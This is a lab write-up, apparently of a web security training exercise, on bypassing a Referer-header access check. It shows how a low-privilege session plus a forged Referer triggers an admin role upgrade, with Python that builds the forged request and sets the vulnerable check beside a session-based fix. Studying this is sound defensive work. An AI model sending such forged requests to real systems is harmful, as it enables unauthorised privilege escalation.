This lab controls access to certain admin functionality based on the Referer header. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
After logging in as administrator, I explored the admin panel and identified the "upgrade" feature, which elevates a user's role. I started an upgrade for the user "carlos" and captured the request in Burp Repeater:
I then replayed the same upgrade request with the session cookie swapped for that of the user "wiener", and received an "Unauthorized" response. The Referer header is set entirely by the client, so it proves nothing about where a request came from; I added a Referer header pointing at the "/admin" page, which the server treats as a trusted origin, and the upgrade was accepted. An access check must instead be tied to the role stored against the session on the server side. The modified request was:
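The following is an added example, not code from the lab or from the original writeup. It models the vulnerable Referer check next to a session-bound role check, builds the raw request the bypass sends, and runs both checks against it. The endpoint path (/admin-roles?username=...&action=upgrade), the cookie name "session", the session values and the host are assumptions for illustration.

```python
# Added example (not the lab's own code): a Referer-based access check beside a
# session-bound one, plus the forged request that defeats the former.
from http.cookies import SimpleCookie

# Constructed session store: session cookie value -> (username, role).
SESSIONS = {
    "a1b2c3-admin": ("administrator", "admin"),
    "d4e5f6-wiener": ("wiener", "user"),
}


def session_of(headers):
    """Return the (username, role) tuple for the request's session cookie, or None."""
    cookie = SimpleCookie()
    cookie.load(headers.get("Cookie", ""))
    morsel = cookie.get("session")  # assumed cookie name
    return SESSIONS.get(morsel.value) if morsel else None


def referer_based_check(headers):
    """VULNERABLE: accepts the request if it claims to originate from /admin.
    Referer is client-supplied, so any user can satisfy this check."""
    return headers.get("Referer", "").endswith("/admin")


def session_based_check(headers):
    """FIXED: derive the role from server-side session state only."""
    session = session_of(headers)
    return session is not None and session[1] == "admin"


def handle_upgrade(headers, check):
    """The upgrade handler with a pluggable access check; returns (status, body)."""
    if not check(headers):
        return 401, "Unauthorized"
    user = session_of(headers)
    return 200, f"upgraded by {user[0] if user else 'anonymous'}"


def forge_request(host, session_value, target_user):
    """Raw HTTP request the bypass sends: a low-privilege cookie plus a forged Referer."""
    return (
        f"GET /admin-roles?username={target_user}&action=upgrade HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: session={session_value}\r\n"
        f"Referer: https://{host}/admin\r\n"
        "\r\n"
    )


def headers_from_request(raw):
    """Parse the header block of a raw HTTP request into a dict."""
    headers = {}
    for line in raw.split("\r\n")[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


if __name__ == "__main__":
    host = "lab.example"  # placeholder host, not a real lab address
    forged = forge_request(host, "d4e5f6-wiener", "carlos")
    hdrs = headers_from_request(forged)
    print(handle_upgrade(hdrs, referer_based_check))  # (200, ...): forged Referer is trusted
    print(handle_upgrade(hdrs, session_based_check))  # (401, ...): wiener's session is not admin
```

Running the forged request through both checks shows the difference: the Referer check lets wiener's session perform the upgrade, while the session-bound check still returns 401 because the role lives in server-side state the client cannot edit.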